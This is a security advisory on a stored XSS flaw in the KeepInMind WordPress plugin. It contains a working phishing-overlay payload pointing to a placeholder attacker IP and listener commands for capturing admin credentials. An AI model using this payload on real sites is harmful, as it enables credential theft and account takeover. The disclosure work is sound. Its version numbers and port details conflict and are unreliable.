KeepInMind – Dashboard Notes < 0.8.4.2 – Contributor+ Stored XSS | CVE 2026-9271

Description

Vulnerability Title
Stored Cross-Site Scripting (XSS) leading to Administrative Account Takeover (ATO) and Persistent Denial of Service (DoS)

Severity Rating
Severity: CRITICAL
CVSS Score: 9.0
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

The KeepInMind - Dashboard Notes plugin (version 0.8.2.9 and below) is vulnerable to Stored Cross-Site Scripting (XSS) via the REST API. The vulnerability exists because the plugin fails to sufficiently sanitize the content parameter when saving notes. Specifically, the plugin’s implementation of wp_kses allows the style attribute and dangerous CSS properties such as position: fixed, z-index, and viewport units (vw/vh).

An authenticated user with a low-privileged role (such as Contributor, if enabled in plugin settings) can inject a malicious payload into a note. When an Administrator views the dashboard, this payload executes in their browser, using CSS to redress the entire user interface.

By overlaying a high-fidelity, fake "Session Expired" re-authentication prompt, the attacker can hijack the administrative UI. This allows for an Administrative Account Takeover (ATO) by tricking the victim into entering their credentials, which are then exfiltrated to an attacker-controlled external server. This represents a complete breach of the security boundary between different user roles (Vertical Privilege Escalation).

Proof of Concept

How to Reproduce
1. Environment Setup & Configuration
- Install and activate the KeepInMind - Dashboard Notes plugin (v0.8).
- As an Administrator, go to the plugin settings and ensure the Contributor role is checked under "Allowed Roles". This enables the attack vector for low-privileged users.

2. Attacker Preparation
- On your attacker machine (e.g., Kali Linux), prepare a simple phishing landing page (e.g., a fake WordPress login) and host it using a local server:
python3 -m http.server 9000
- Start a listener to capture the exfiltrated credentials:
nc -lvp 8000

3. The Injection (Attacker Action)
- Log in to the WordPress site as a Contributor.
- Click on create notes and provide any message and intercept the request while saving.
- Use Burp Suite to send a POST request to the REST API endpoint /wp-lab/index.php/wp-json/haayal/v1/notes with the following malicious payload:
JSON
{
  "content":"<span style='position:fixed;top:0;left:0;width:100vw;height:100vh;background:#f0f0f1;z-index:9999999;display:flex;align-items:center;justify-content:center;font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,Oxygen-Sans,Ubuntu,Cantarell,\"Helvetica Neue\",sans-serif;'> <div style='background:white;padding:30px;border:1px solid #ccd0d4;width:320px;text-align:center;box-shadow:0 1px 3px rgba(0,0,0,.04);'> <img src='/wp-admin/images/wordpress-logo.svg' width='84' style='margin-bottom:25px;'> <div style='border-left:4px solid #72aee6;background:#fff;box-shadow:0 1px 1px rgba(0,0,0,.1);padding:12px;margin:0 0 25px;text-align:left;font-size:14px;line-height:1.5;color:#3c434a;'>Your session has expired. Please log in to continue where you left off.</div> <a href='http://[Attacker-IP]:9000/' style='text-decoration:none;display:block;'> <button style='background:#2271b1;color:white;padding:10px;border:none;border-radius:3px;cursor:pointer;width:100%;font-size:13px;font-weight:600;line-height:2;'>Log In</button> </a> <p style='margin-top:25px;font-size:13px;text-align:left;'><a href='#' style='color:#2271b1;text-decoration:none;'>&larr; Go to Dashboard</a></p> </div> </span>"
}

4. The Execution (Victim Interaction)
- Log in as the Administrator and navigate to the main Dashboard.
- The stored XSS will trigger immediately, rendering a full-screen "Session Expired" overlay that blocks all Administrative functionality (UI Redressing).

5. Credential Exfiltration
- The Administrator, believing their session has timed out, clicks the "Log In" button.
- The browser redirects the Admin to the attacker's server at http://[ATTACKER_IP]:9000/.
- Any credentials entered on the fake login page are captured in plain text by the attacker's listener on port 9000.

Please refer to the attached video for a step-by-step demonstration of the full attack chain, from Contributor-level injection to Administrative credential capture.

Note: This is a simulated phishing attack conducted in a local, isolated laboratory environment for the purpose of a security audit. No real users or live systems were targeted.

Technical Root Cause
- The vulnerability stems from the keepinmind_save_note (or equivalent) function that processes the REST API request. While the plugin utilizes wp_kses() for sanitization, the configuration for this filter is overly permissive. By allowing the style attribute without a strict whitelist of CSS properties, the plugin fails to prevent CSS Injection.
- Specifically, the use of position: fixed and z-index: 9999999 allows an attacker to break out of the intended dashboard container and manipulate the global viewport of the Administrator.

Impact Assessment
- Vertical Privilege Escalation: Bypasses the WordPress Role-Based Access Control (RBAC) by allowing a low-privileged Contributor to target an Administrator.
- Total Site Compromise: Successful credential harvesting leads to full administrative access, allowing for unauthorized data access, site deletion, or the installation of further backdoors/malware.
- Persistence: The malicious payload remains in the database and executes every time an Administrator visits the dashboard until the specific note is manually removed via the database.
- Beyond the Account Takeover (ATO) risk, this vulnerability also facilitates a Persistent Denial of Service (DoS) against the Administrative interface. By redressing the entire viewport with a fixed-position overlay, the attacker prevents legitimate administrators from accessing any site management functions, effectively disabling the WordPress backend for all administrative users

Recommended Remediation
- Stricter HTML Sanitization: Disable the style attribute entirely within the wp_kses allowed tags list for note content.
- CSS Whitelisting: If inline styles are necessary, implement a strict whitelist of safe CSS properties (e.g., color, font-weight) and strictly forbid positioning properties (position, top, left, z-index).
- Context-Aware Output Encoding: Ensure that the data retrieved from the database is properly escaped before being rendered in the dashboard UI.

Proof of Concept Files
I have attached the following evidence:
- The JSON POST request sent as a Contributor.
- The full-screen phishing interface as seen by the Administrator.
- The attacker's terminal showing the exfiltrated Admin password.
- Please refer to the attached video for a step-by-step demonstration of the full attack chain, from Contributor-level injection to Administrative credential capture.

Final Summary for Finding:
- Stored XSS (The Method)
- Account Takeover (The Goal)
- UI-Based DoS (The Secondary Impact)

As the developer does not have a publicly listed security contact I guess, I have officially reported this critical vulnerability to the WordPress.org Plugins Team (plugins@wordpress.org) on April 26, 2026, to facilitate the disclosure and patching process.